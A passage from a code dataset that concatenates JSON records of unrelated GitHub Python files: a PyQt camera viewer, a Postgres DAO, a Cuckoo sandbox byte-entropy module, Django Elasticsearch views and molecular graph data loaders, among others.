\"\"\"后续被重载\"\"\"\n","repo_name":"Lalalaashen/DeepReinforcedLearningPlayground","sub_path":"GymBase.py","file_name":"GymBase.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"1452568912","text":"from urls import urlpatterns\nfrom pprint import pprint\n\nwhile True:\n try:\n url, arg = input(\"Вы можете выбрать: listing/, create/, retrieve/, update/, delete/, comment/ \").split(\"/\")\n except ValueError:\n print(\"Enter a valid url\")\n continue\n \n found = False\n for uri, view in urlpatterns:\n if uri.split(\"/\")[0] == url:\n found = True\n try:\n if arg:\n pprint(view(arg))\n else:\n pprint(view())\n except Exception as e:\n print(e)\n if not found:\n print(\"404 Url Not Found\")\n","repo_name":"Beknaz/py21-projekts","sub_path":"first_hackaton/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43324210898","text":"\nclass Write:\n def __init__(self,string,var,errores):\n self.string=string\n self.var=var\n self.errores=errores\n\n def CheckSintax(self):\n data=list(self.string)\n data=self.CheckWrite(data)\n if data :\n if self.CheckParentesis(data):\n self.errores=self.CheckContenido(data=data)\n return self.errores\n self.errores.append('Error en '+self.string)\n return self. errores \n \n def DefineSintax(self):\n sintax=[\n \"W\",\n \"r\",\n \"i\",\n \"t\",\n \"e\",\n '(',\n \")\"\n ]\n return sintax\n def CheckWrite(self,string):\n sintax=self.DefineSintax()\n for i in range (0,5):\n if sintax[i]==string[0]:\n string.pop(0)\n else:\n return False\n return string\n def CheckParentesis(self,string):\n if string[0]=='(' and string[len(string)-1]==')':\n string.pop()\n string.pop(0)\n return string\n return False\n\n def CheckContenido(self,data):\n if '\"' in data or \"'\" in data:\n comillas=['\"',\"'\"]\n if data[0] in comillas and data[len(data)-1] in comillas and data[0]==data[len(data)-1]:\n num_comillas=0\n for x in data:\n if x==data[0]:\n num_comillas+=1\n if num_comillas==2:\n self.errores.append(self.CadenaCorrecta())\n return self.errores\n else:\n #check if is a number \n numbers,letters=self.CheckNumbers(data)\n if numbers>0 and letters==0:\n self.errores.append(self.CadenaCorrecta())\n return self.errores\n else :\n if numbers==0 and letters>0:\n #check of the vars exist\n return self.SearchNameVar(data=data)\n self.errores.append('Error en '+self.string)\n return self.errores\n\n def SearchNameVar(self,data):\n aux=\"\"\n for x in data:\n aux+=x\n for i in self.var:\n if i.name==aux:\n self.errores.append(self.CadenaCorrecta())\n return self.errores\n self.errores.append('Error Variable no declarada '+self.string)\n return self.errores\n\n def CheckNumbers(self,data):\n numbers=0\n letter=0\n matrix = [str(x) for x in range(0, 10)]\n for element in data:\n if (element in matrix)==False:\n letter+=1\n else:\n numbers+=1\n return numbers,letter\n\n def CadenaCorrecta(self):\n return 'Cadena correcta '+self.string\n\n\n\n \n\n\n\n\n\n","repo_name":"SamuelNarciso/Analizador_Sintactico","sub_path":"AnalizadorSintactico/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33524613433","text":"import argparse\nimport random\nfrom pathlib import Path\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\n\nimport util.misc as utils\nfrom datasets import build_gen_dataset\nfrom datasets import build_fag_dataset\nfrom engine import evaluate_hoi_fag\nfrom models.hoitr_text import build as build_model\nfrom util.argparser import get_args_parser\n\n\ndef main(args):\n checkpoint = torch.load(args.resume, map_location='cpu')\n tmp_output_dir = args.output_dir\n\n # overwrite args\n args = checkpoint['args']\n args.output_dir = tmp_output_dir\n print(f\"Load model from Epoch {checkpoint['epoch']}\")\n\n # Fix the seed for reproducibility.\n device = torch.device(args.device)\n seed = args.seed + utils.get_rank()\n torch.manual_seed(seed)\n np.random.seed(seed)\n random.seed(seed)\n\n if args.use_fag_setting:\n # FG dataset\n dataset_val = build_fag_dataset(image_set=\"val\", args=args)\n else:\n # GEN-VL-KT dataset\n dataset_val = build_gen_dataset(image_set='val', args=args)\n\n sampler_val = torch.utils.data.SequentialSampler(dataset_val)\n data_loader_val = DataLoader(dataset_val, 8, sampler=sampler_val,\n drop_last=False, collate_fn=utils.collate_fn, num_workers=args.num_workers)\n\n model, _, postprocessors = build_model(args)\n model.to(device)\n\n model.load_state_dict(checkpoint['model'])\n print(f\"Load model from Epoch {checkpoint['epoch']}\")\n\n test_stats = evaluate_hoi_fag(args.dataset_file, model, postprocessors, data_loader_val,\n args.subject_category_id, device, args)\n print(test_stats)\n return\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('SentenceHOI training and evaluation script', parents=[get_args_parser()])\n arg = parser.parse_args()\n if arg.output_dir:\n arg.output_dir = arg.output_dir+\"_test\"\n Path(arg.output_dir).mkdir(parents=True, exist_ok=True)\n main(arg)\n","repo_name":"m1stborn/sentence-hoi","sub_path":"test_text_hoitr.py","file_name":"test_text_hoitr.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"106920904","text":"#Importing necessary libraries, mainly the OpenCV, and PyQt libraries\nimport cv2\nimport numpy as np\nimport sys\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom cv2 import *\n\nclass ShowVideo(QtCore.QObject):\n\n\tcamera_port = 0\n\tcamera = cv2.VideoCapture(camera_port)\n\tVideoSignal = QtCore.pyqtSignal(QtGui.QImage)\n\n\tdef __init__(self, parent = None):\n\t\tsuper(ShowVideo, self).__init__(parent)\n\n\t@QtCore.pyqtSlot()\n\tdef startVideo(self):\n\n\t\trun_video = True\n\t\twhile run_video:\n\t\t\tret, image = self.camera.read()\n\t\t\t\n\t\t\tcolor_swapped_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n\t\t\theight, width, _ = color_swapped_image.shape\n\t\t\t\n\t\t\tqt_image = QtGui.QImage(color_swapped_image.data,\n\t\t\t\t\t\t\t\t\twidth, \n\t\t\t\t\t\t\t\t\theight,\n\t\t\t \t\t\t\t\t\tcolor_swapped_image.strides[0],\n\t\t\t \t\t\t\t\t\tQtGui.QImage.Format_RGB888)\n\n\t\t\tpixmap = QtGui.QPixmap(qt_image)\n\t\t\t# qt_image = pixmap.scaled(750, 600, QtCore.Qt.KeepAspectRatio)\n\t\t\t# qt_image = QtGui.QImage(qt_image)\n\t\t\tqt_image = QtGui.QImage(pixmap)\n\n\t\t\tself.VideoSignal.emit(qt_image)\n\n\tdef startVideo2(self):\n \n\t\trun_video = True\n\t\twhile run_video:\n\t\t\tret, image = self.camera.read()\n\t\t\t\n\t\t\tcolor_swapped_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n\t\t\tb, g, r = cv2.split(color_swapped_image)\n\t\t\tb_equal = equalizeHist(b)\n\t\t\tg_equal = equalizeHist(g)\n\t\t\tr_equal = equalizeHist(r)\n\t\t\tresult = merge([b_equal, g_equal, r_equal])\n\n\t\t\theight, width, _ = color_swapped_image.shape\n\n\t\t\tqt_image2 = QtGui.QImage(result,\n\t\t\t\t\t\t\t\t\twidth, \n\t\t\t\t\t\t\t\t\theight,\n\t\t\t\t\t\t\t\t\tcolor_swapped_image.strides[0],\n\t\t\t\t\t\t\t\t\tQtGui.QImage.Format_RGB888)\n\n\t\t\tpixmap2 = QtGui.QPixmap(qt_image2)\n\t\t\t# qt_image2 = pixmap2.scaled(750, 600, QtCore.Qt.KeepAspectRatio)\n\t\t\t# qt_image2 = QtGui.QImage(qt_image2)\n\t\t\tqt_image2 = QtGui.QImage(pixmap2)\n\n\t\t\tself.VideoSignal.emit(qt_image2)\n\n\n\nclass ImageViewer(QtWidgets.QWidget):\n\tdef __init__(self, parent = None):\n\t\tsuper(ImageViewer, self).__init__(parent)\n\t\tself.image = QtGui.QImage()\n\t\tself.setAttribute(QtCore.Qt.WA_OpaquePaintEvent)\n\n\tdef paintEvent(self, event):\n\t\tpainter = QtGui.QPainter(self)\n\t\tpainter.drawImage(0,0, self.image)\n\t\tself.image = QtGui.QImage()\n\n\tdef initUI(self):\n\t\tself.setWindowTitle('Test')\n\n\t\n\t@QtCore.pyqtSlot(QtGui.QImage)\n\tdef setImage(self, image):\n\t\tif image.isNull():\n\t\t\tprint(\"viewer dropped frame!\")\n\n\t\tself.image = image\n\t\tif image.size() != self.size():\n\t\t\tself.setFixedSize(image.size())\n\t\tself.update()\n\n\nif __name__ == '__main__':\n\n\tapp = QtWidgets.QApplication(sys.argv)\n\tthread = QtCore.QThread()\n\tthread.start()\n\tthread2 = QtCore.QThread()\n\tthread2.start()\n\n\tvid = ShowVideo()\n\tvid.moveToThread(thread)\n\tvid2 = ShowVideo()\n\tvid2.moveToThread(thread2)\n\timage_viewer = ImageViewer()\n\timage_viewer2 = ImageViewer()\n\n\tvid.VideoSignal.connect(image_viewer.setImage)\n\tvid2.VideoSignal.connect(image_viewer2.setImage)\n\n\tpush_button = QtWidgets.QPushButton('Original')\n\tpush_button.clicked.connect(vid.startVideo)\n\tpush_button2 = QtWidgets.QPushButton('Restored')\n\tpush_button2.clicked.connect(vid2.startVideo2)\n\tvertical_layout = QtWidgets.QHBoxLayout()\n\n\tvertical_layout.addWidget(image_viewer)\n\tvertical_layout.addWidget(image_viewer2)\n\tvertical_layout.addWidget(push_button)\n\tvertical_layout.addWidget(push_button2)\n\n\tlayout_widget = QtWidgets.QWidget()\n\tlayout_widget.setLayout(vertical_layout)\n\n\tmain_window = QtWidgets.QMainWindow()\n\tmain_window.setCentralWidget(layout_widget)\n\tmain_window.resize(1000,800)\n\tmain_window.show()\n\tsys.exit(app.exec_())","repo_name":"JialinKang/endoscope_PyQt5","sub_path":"realTime_camera.py","file_name":"realTime_camera.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8013621930","text":"import os\n\nimport psycopg2.extras\n\n\nclass DAO:\n\n def __init__(self):\n self._cursor = None\n\n @property\n def cursor(self):\n if self._cursor is not None:\n return self._cursor\n\n conn = psycopg2.connect(host=os.environ['POSTGRES_HOST'],\n port=os.environ['POSTGRES_PORT'],\n dbname=os.environ['POSTGRES_DB'],\n user=os.environ['POSTGRES_USER'],\n password=os.environ['POSTGRES_PASSWORD'])\n conn.autocommit = True\n self._cursor = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n\n return self._cursor\n\n def close(self):\n if self._cursor:\n self._cursor.connection.close()\n self._cursor.close()\n\n def save_transaction(self, transaction):\n stmt = \"\"\"\n INSERT INTO ally_transactions\n (posted_at, type, description, amount, balance) VALUES\n (%(posted_at)s, %(type)s, %(description)s, %(amount)s, %(balance)s)\n RETURNING id\n \"\"\"\n self.cursor.execute(stmt, transaction)\n\n return self.cursor.fetchone()[0]\n\n def get_last_transaction(self):\n stmt = \"\"\"\n SELECT posted_at, type, description, amount, balance\n FROM ally_transactions order by posted_at desc limit 1\n \"\"\"\n self.cursor.execute(stmt)\n\n row = self.cursor.fetchone()\n\n if row:\n row = dict(row)\n\n return row\n","repo_name":"rchacon/ally","sub_path":"ally/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6202864410","text":"n, k = map(int,input().split())\ncoin = []\ndp = [0 for _ in range(k+1)]\n\nfor i in range(n):\n c = int(input())\n if c <= k:\n coin.append(c)\n dp[c] = 1\n\n\nfor i in range(1,k+1):\n a = []\n for j in coin:\n if j <= i and dp[i-j] != -1:\n a.append(dp[i-j])\n if not a:\n dp[i] = -1\n else:\n dp[i] = min(a) + 1\n\nprint(dp[k])","repo_name":"raipier8818/BaekJoon","sub_path":"Python/2294.py","file_name":"2294.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8515320219","text":"import os\nimport math\nimport logging\nfrom cuckoo.common.abstracts import Processing\nfrom cuckoo.common.objects import File\nlog = logging.getLogger(__name__)\n\nclass ByteFrequencyDistribution(Processing):\n \"\"\"Get byte frequency distribution table & shannon entropy results.\"\"\"\n\n def _get_byte_frequency_table(self, file_path):\n \"\"\"Get byte frequency table dict.\n @param file_path: file path.\n @return: byte frequency table(over 0) dict or None.\n \"\"\"\n try:\n with open(file_path, 'rb') as f:\n data = f.read()\n except IOError as e:\n log.exception(e)\n return {}\n frequency_table = {}\n byte_arr = map(ord, data)\n filesize = len(byte_arr)\n for byte_idx in range(256):\n cnt = 0\n for byte in byte_arr:\n if byte == byte_idx:\n cnt += 1\n if cnt > 0:\n frequency_table[str(format(byte_idx,'02X'))] = round((float(cnt) / filesize) * 100, 3)\n if not frequency_table:\n return {}\n return frequency_table\n\n def _get_shannon_entropy(self, bytefreq):\n \"\"\"Calculate shannon entropy(min bits per byte-character).\n @param bytefreq: byte frequency list.\n @return: shannon entropy float.\n \"\"\"\n ent = 0.0\n for freq in bytefreq:\n freq = freq / 100\n if freq > 0:\n ent = ent + freq * math.log(freq, 2)\n ent = -ent\n return round(ent, 3)\n\n def run(self):\n \"\"\"Run byte frequency distribution analysis.\n @return: analysis results dict or None.\n \"\"\"\n self.key = \"bytefreqdist\"\n if self.task[\"category\"] == \"file\":\n if not os.path.exists(self.file_path):\n return {}\n f = File(self.file_path)\n else:\n return {}\n\n try:\n frequency_table = self._get_byte_frequency_table(f.file_path)\n if frequency_table:\n frequency_table[\"shannon_entropy\"] = self._get_shannon_entropy(frequency_table.values())\n return frequency_table\n except Exception as e:\n log.exception(e)\n return {}\n\n","repo_name":"SCPJaehyeon/byte-frequency-distribution-processing-module","sub_path":"cuckoo/processing/bytes.py","file_name":"bytes.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11716538733","text":"T = int(input())\r\nfor x in range(T):\r\n n = int(input())\r\n g = int(input())\r\n l1 = str(input()).split()\r\n for g in range(len(l1)):\r\n l1[g] = int(l1[g])\r\n l1.sort()\r\n answer = 0\r\n for y in range(n):\r\n answer += l1[y]\r\n print(answer)\r\n l1 = []\r\n","repo_name":"blackphin/Competitive-Coding","sub_path":"Code Gladiators 2022/Challenge 2.py","file_name":"Challenge 2.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1959117789","text":"#Import libraries and modules \n\nimport warnings\nwarnings.filterwarnings('ignore',category=FutureWarning) # ignores warnings about future version of numpy\n\n#For JSON data\nimport json\n\n#For interacting with operating system \nimport os\n\n#For copying files\nimport shutil\n\n#For vector/array operations\nimport numpy as np\nfrom numpy import asarray\nfrom random import sample\nimport random \nfrom random import shuffle\nimport math\nfrom time import time\nimport datetime\n\n#For loading and preprocessing images\nfrom PIL import Image \nimport matplotlib.pyplot as plt\n\nprint('Numpy version', np.__version__)\nstart_time = time()\n\n#1. Dataset exploration \n#Current directory \nprint(os.getcwd())\n\n#1.1 Load annotations: annotations.json[1] contains annotations in COCO[2] format\n\ndata_dir = os.path.join(os.getcwd(), os.pardir, \"data\") #your job: define data_dir\nanno_file = os.path.join(data_dir, \"annotations.json\") #your job: path for *.json file\n\nwith open(anno_file, \"r\") as f: # annotations.json is a nested dictionary (keys are mapped to another dictionary within original dictionary) \n annotations = json.load(f) # your job: parse JSON string \n\n#1.2 Explore annotations dictionary\n#Exercise: explore each annotation key\n\n#Number of images\nlen(annotations[\"images\"])\n\n#Number of annotations \nlen(annotations[\"annotations\"]) \n\n#1.2.1 Question to audience: Explain why there are more annotations than images\n#Image information\nannotations[\"images\"][320]\n\nannotations[\"images\"][1210] #your job: explore the annotation\n\n#1.2.2 Exercise: explore annotation for image_id 6\nfor anno in annotations [\"annotations\"]:\n if anno[\"image_id\"]==6:\n print(anno)\n\nannotations[\"categories\"][11]\n\nfor anno in annotations [\"scene_annotations\"]:\n if anno[\"image_id\"]==6:\n print(anno)\n\n#1.2.3 Exercise for advanced participants: explore nested dictionary in details.\n\n\n#2. Preprocessing\n# For simplicity, we create a simplified dictionary w.r.t to each image and its associated categories. We store only a subset of information, e.g. 'image_id', 'file_name', 'height', 'width', 'category_ids', 'category_names', and 'super_categories'\n\n#2.1 Open annotation file and read into memory\nwith open(anno_file, \"r\") as f:\n annotations = json.load(f)\n\n# 2.2 Prepare category id to name mappings. Items are ordered by category_id, so you can get the\n# category name of a category_id via the category_id, e.g.\n# via annotations[\"categories\"][category_id]\ncategories = annotations[\"categories\"]\n\n#2.3 Create new python dictionary with subset of relevant information (e.g. image -> category data)\ndata = {}\nfor i, item in enumerate(annotations[\"annotations\"]):\n #Map image_id to image filename using the \"images\" part of the dataset.\n image_id = item[\"image_id\"]\n image_info = annotations[\"images\"][image_id]\n file_name = image_info[\"file_name\"]\n height,width = image_info[\"height\"], image_info[\"width\"]\n \n #Map category_id of instance to category name\n category_id = item[\"category_id\"]\n category_info = categories[category_id]\n category_name = category_info[\"name\"]\n super_category = category_info[\"supercategory\"]\n \n #A labeled image can have multiple categories, so check if we have already added to the dictionary (e.g. if it's in the keys)\n if image_id in data.keys():\n data[image_id][\"category_ids\"].add(category_id)\n data[image_id][\"category_names\"].add(category_name)\n data[image_id][\"super_categories\"].add(super_category)\n else:\n data[image_id] = {\"file_name\": file_name, \"category_ids\": {category_id}, \"image_id\": image_id, \"height\": height, \"width\": width, \"category_names\": {category_name}, \"super_categories\": {super_category}}\n\nlen(data)\ndata[320] #labels in particular instance in our dataset (image_id = 320)\n\n#3. Binary Classification\n#We can construct a binary classification problem in a one vs all setting, e.g. does this image contain a specific \n# supercategory or not. Let's create the numpy arrays corresponding to the images and labels that we can use for training.\n\n#3.1 Split data into training, validation, and test\n\ndata_ids = list(data.keys())\n\n\n#Configure proportion of training, validation, and test data\ntrain_perc = 0.8\nval_perc = 0.1\ntest_perc = 0.1\ntrain_size=int(len(data_ids)*train_perc)\nval_size=int(len(data_ids)*val_perc)\ntrain_ids, val_ids, test_ids = (\n data_ids[:train_size],\n data_ids[train_size : train_size + val_size],\n data_ids[train_size + val_size :],\n )\n\nprint(\"Number of images in training dataset:\", len(train_ids))\nprint(\"Training image_ids:\", train_ids)\n\nprint(\"Number of images in validation dataset:\", len(val_ids))\nprint(\"Validation image_ids:\", val_ids)\n\nprint(\"Number of images in dataset:\", len(test_ids))\nprint(\"test image_ids:\", test_ids)\n\nprint(len(test_ids))\n\n#3.2 Define helper function for loading data and converting to numpy arrrays\n\ndef load_data(ids, data, supercategory):\n num_instances = len(ids)\n max_height, max_width = 1000, 1000 #TBD revisit max heigh and width\n labels = np.zeros((num_instances,))\n images = np.zeros((num_instances,max_height,max_width))\n\n for i, image_id in enumerate(ids):\n #Convert labels into a binary classification problem (e.g. 0 or 1 depending on the super_category)\n if supercategory in data[image_id][\"super_categories\"]:\n labels[i] = 1\n\n #Load images into numpy arrays\n try: \n image = Image.open(os.path.join(data_dir,data[image_id][\"file_name\"])).convert(\"L\") # Grayscale\n image = image.resize(size=(max_height, max_width))\n images[i] = asarray(image) #Convert and store as numpy array\n\n except Exception as e:\n print(e) #Use this to catch and print exceptions\n return images, labels\n\n#3.3 Define supercategory of interest (in this case 'Bottle') and load training, validation, and test data \nsupercategory = \"Bottle\"\ntrain_images, train_labels = load_data(train_ids, data, supercategory)\nval_images, val_labels = load_data(val_ids, data, supercategory)\ntest_images, test_labels = load_data(test_ids, data, supercategory)\n\nwork_dir = os.path.join(os.getcwd(), \"work_data\") # directory: combination of current directory and saved model string\narr_file_trimg = os.path.join(work_dir, \"train_images\") # path to the trained model to save \narr_file_bl = os.path.join(work_dir, \"train_labels\") # path to the trained model to save\narr_file_valimg = os.path.join(work_dir, \"val_images\") # path to the trained model to save \narr_file_vallabel = os.path.join(work_dir, \"val_labels\") # path to the trained model to save\narr_file_testimg = os.path.join(work_dir, \"test_images\") # path to the trained model to save \narr_file_testlabel = os.path.join(work_dir, \"test_labels\") # path to the trained model to save\n\n#Check if directory exists. If not, create it\ntry:\n os.stat(work_dir)\nexcept:\n os.mkdir(work_dir)\n\nnp.save(arr_file_trimg, train_images, allow_pickle=False, fix_imports=False)\nnp.save(arr_file_bl, train_labels, allow_pickle=False, fix_imports=False)\nnp.save(arr_file_valimg, val_images, allow_pickle=False, fix_imports=False)\nnp.save(arr_file_vallabel, val_labels, allow_pickle=False, fix_imports=False)\nnp.save(arr_file_testimg, test_images, allow_pickle=False, fix_imports=False)\nnp.save(arr_file_testlabel, test_labels, allow_pickle=False, fix_imports=False)\n\nend_time = time()\ntotal_time = end_time - start_time\nprint(\"Execution time:\", str(datetime.timedelta(seconds=total_time)))\n\n","repo_name":"khatuka31/Waste_Classification","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":7560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27073824054","text":"from django_elasticsearch_dsl_drf.constants import (\n LOOKUP_FILTER_RANGE,\n LOOKUP_QUERY_GT,\n LOOKUP_QUERY_GTE,\n LOOKUP_QUERY_IN,\n LOOKUP_QUERY_LT,\n LOOKUP_QUERY_LTE,\n SUGGESTER_COMPLETION,\n)\nfrom django_elasticsearch_dsl_drf.filter_backends import (\n DefaultOrderingFilterBackend,\n FilteringFilterBackend,\n SearchFilterBackend,\n SuggesterFilterBackend,\n)\nfrom django_elasticsearch_dsl_drf.viewsets import DocumentViewSet, Search\nfrom rest_framework.views import APIView\nfrom rest_framework import generics, permissions\nfrom rest_framework import parsers, renderers, status\nfrom rest_framework.response import Response\nfrom .documents import OsosDocument\nfrom .serializers import OsosDocumentSerializer\nfrom .data import msgWithNamedFields\nfrom .models import Osos\n\nclass OsosInsertData(APIView):\n queryset = Osos.objects.all()\n model = Osos\n serializer_class = OsosDocumentSerializer\n permission_classes = [permissions.AllowAny]\n\n def get(self, request, *args, **kwargs):\n data = msgWithNamedFields\n if type(data) == dict:\n self.model.objects.create(**data)\n response = {\n 'status': 'success',\n 'code': status.HTTP_200_OK,\n 'message': 'Password updated successfully',\n 'data': []\n }\n\n return Response(response)\n\nclass OsosViewSet(DocumentViewSet):\n document = OsosDocument\n serializer_class = OsosDocumentSerializer\n lookup_field = 'deviceId'\n\n filter_backends = [\n DefaultOrderingFilterBackend,\n FilteringFilterBackend,\n SearchFilterBackend,\n SuggesterFilterBackend,\n ]\n\n search_fields = '__all__'\n\n filter_fields = {\n 'id': {\n 'field': 'deviceId',\n 'lookups': [\n LOOKUP_FILTER_RANGE,\n LOOKUP_QUERY_IN,\n LOOKUP_QUERY_GT,\n LOOKUP_QUERY_GTE,\n LOOKUP_QUERY_LT,\n LOOKUP_QUERY_LTE,\n ],\n },\n }\n\n suggester_fields = {\n 'deviceId_suggest': {\n 'field': 'deviceId.suggest',\n 'suggesters': [\n SUGGESTER_COMPLETION,\n ],\n },\n }\n","repo_name":"dryalcinmehmet/moonbird","sub_path":"app/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12080361143","text":"import numpy as np\nimport pickle\nimport tensorflow as tf\n\n# loading the data\n\"\"\"\neach X are normalized differently.\n\"\"\"\n\n\"\"\"\nmax U0 ['molecule0'] = -1101.4877900833399 = -40.478909210233205eV\nmin U0 ['molecule133620'] = -19444.3873485546 = -714.5676940015802eV\n1 ha = 27.2114 ev\n\"\"\"\n# minE = 1101.4877900833399\n# maxE = 19444.3873485546\n\nminE = 40.478909210233205\nmaxE = 714.5676940015802\n\nmaxX = 0.5*9**2.4\n\nmin_muX = -0.5\nmax_muX = 0.5\n\n\"\"\"\nG : max -1102.022956412281 min -19445.314630956153\nH : max -1101.384033068429 min -19444.146473365512\nCv : max 46.969 min 6.002\n\"\"\"\n\nmax_G = 19445.314630956153\nmin_G = 1102.022956412281\n\nmax_H = 19444.146473365512\nmin_H = 1101.384033068429\n\nmax_Cv = 46.969\nmin_Cv = 6.002\n\nmax_min_dict = {\n 'G' : [max_G, min_G],\n 'H' : [max_H, min_H],\n 'Cv' : [max_Cv, min_Cv]\n}\n\ndef load_dict(file_path):\n with open(file_path, 'rb') as f:\n dict_subset = pickle.load(f)\n\n return dict_subset\n\ndef convert_to_inputs_outputs(AXEN_dict_subset, molecule_num_list, subset_num):\n A_array_list = []\n X_array_list = []\n output_E_list = []\n molecule_atom_num_list = []\n \n for i in molecule_num_list:\n A_hat = AXEN_dict_subset['molecule{}'.format(i)][0]\n D_hat = np.diag(np.sum(A_hat, axis=0))\n D_inv = np.linalg.inv(D_hat)\n A = np.dot(D_inv, A_hat)\n\n A_array = [\n A\n ]\n A_array = np.asarray(A_array)\n # A_array's shape is (1,29,29)\n\n num = AXEN_dict_subset['molecule{}'.format(i)][3]\n N = np.ones([1,29], dtype=np.int32)\n for N_num in range(num):\n N[0, N_num] = 0\n\n N_array = [\n N\n ]\n N_array = np.asarray(N_array).reshape([-1,1])\n # N_array's shape is (1,29,1)\n\n # X normalisation\n X = AXEN_dict_subset['molecule{}'.format(i)][1]\n # X = X/maxX/N**2\n X = X/maxX\n X_array = [\n X\n ]\n X_array = np.asarray(X_array)\n # X_array's shape is (1,29,29)\n\n E = AXEN_dict_subset['molecule{}'.format(i)][2]/27.2114\n # energy in ev\n E = (-E-minE)/(maxE-minE)\n # E = -1 + 2*(-E-minE)/(maxE-minE)\n # E normalisation btw (0, 1)\n E_array = [\n E\n ]\n E_array = np.asarray(E_array).reshape([-1,1])\n # E_array's shape is (1,1)\n\n \n\n A_array_list.append(A_array)\n X_array_list.append(X_array)\n output_E_list.append(E_array)\n molecule_atom_num_list.append(N_array)\n \n result = {\n 'A' : A_array_list,\n 'X' : X_array_list,\n 'E' : output_E_list,\n 'N' : molecule_atom_num_list\n }\n\n return result\n\ndef convert_to_muX(AXEN_dict_subset, muX_dict_subset, molecule_num_list, subset_num):\n muX_array_list = []\n \n for i in molecule_num_list:\n \n N = AXEN_dict_subset['molecule{}'.format(subset_num*1000 + i)][3]\n \n # muX normalisation\n muX = muX_dict_subset['molecule{}'.format(subset_num*1000 + i)]\n muX = muX/N**2\n # max_muX - min_muX = 1\n muX_array = [\n muX\n ]\n muX_array = np.asarray(muX_array)\n # muX_array's shape is (1,29,29)\n\n muX_array_list.append(muX_array)\n \n return muX_array_list\n\ndef split_data_set(result, train_set_size, valid_set_size, test_set_size):\n A_train = result['A'][0:train_set_size]\n A_valid = result['A'][train_set_size:train_set_size+valid_set_size]\n X_train = result['X'][0:train_set_size]\n X_valid = result['X'][train_set_size:train_set_size+valid_set_size]\n E_train = result['E'][0:train_set_size]\n E_valid = result['E'][train_set_size:train_set_size+valid_set_size]\n \n A_test = []\n X_test = []\n E_test = []\n \n for i in range(test_set_size):\n A_test.append(result['A'][np.random.randint(0,1000)])\n X_test.append(result['X'][np.random.randint(0,1000)])\n E_test.append(result['E'][np.random.randint(0,1000)])\n \n split_result = {\n 'A_train' : A_train,\n 'X_train' : X_train,\n 'E_train' : E_train,\n 'A_valid' : A_valid,\n 'X_valid' : X_valid,\n 'E_valid' : E_valid,\n 'A_test' : A_test,\n 'X_test' : X_test,\n 'E_test' : E_test\n }\n\n return split_result\n \ndef convert_to_inputs_outputs_tf(AXEN_dict_subset, molecule_num, subset_num):\n\n A_list = []\n X_list = []\n output_E_list = []\n molecule_atom_num_list = []\n \n\n\n for i in range(molecule_num):\n A_hat = AXEN_dict_subset['molecule{}'.format(subset_num*1000 + i)][0]\n D_hat = np.diag(np.sum(A_hat, axis=0))\n D_inv = np.linalg.inv(D_hat)\n A = np.dot(D_inv, A_hat)\n\n A = tf.convert_to_tensor(A)\n # A is a tensor shape (29,29)\n\n N = AXEN_dict_subset['molecule{}'.format(subset_num*1000 + i)][3]\n N_array = [\n N\n ]\n N_array = np.asarray(N).reshape([-1,1])\n # N_array's shape is (1,1)\n\n # X normalisation\n X = AXEN_dict_subset['molecule{}'.format(subset_num*1000 + i)][1]\n X = X/maxX/N**2\n X = tf.convert_to_tensor(X)\n # X is a tensor shape (29,29)\n\n E = AXEN_dict_subset['molecule{}'.format(subset_num*1000 + i)][2]\n E = (-E-minE)/(maxE-minE)\n # E normalisation btw (0, 1)\n E = tf.convert_to_tensor(E)\n # E shape ()\n \n\n A_list.append(A)\n X_list.append(X)\n output_E_list.append(E)\n molecule_atom_num_list.append(N_array)\n\n # converting all to tensor\n A_list = tf.convert_to_tensor(A_list)\n X_list = tf.convert_to_tensor(X_list)\n output_E_list = tf.convert_to_tensor(output_E_list)\n result = {\n 'A' : A_list,\n 'X' : X_list,\n 'E' : output_E_list,\n 'N' : molecule_atom_num_list\n }\n\n\ndef convert_output(which_output, output_file_path, molecule_num_list):\n output_dict = {\n 'G' : 'free_G',\n 'Cv' : 'Cv',\n 'H' : 'enthalpy'\n }\n output_file_path = output_file_path +'\\\\molecule_{}_dict.pickle'.format(output_dict[which_output])\n\n output_value_dict = load_dict(output_file_path)\n\n output_list = []\n\n for i in molecule_num_list:\n \n output = output_value_dict['molecule{}'.format(i)]\n output = (abs(output)-max_min_dict[which_output][1])/(max_min_dict[which_output][0]-max_min_dict[which_output][1])\n # output normalisation btw (0, 1)\n output_array = [\n output\n ]\n output_array = np.asarray(output_array).reshape([-1,1])\n \n 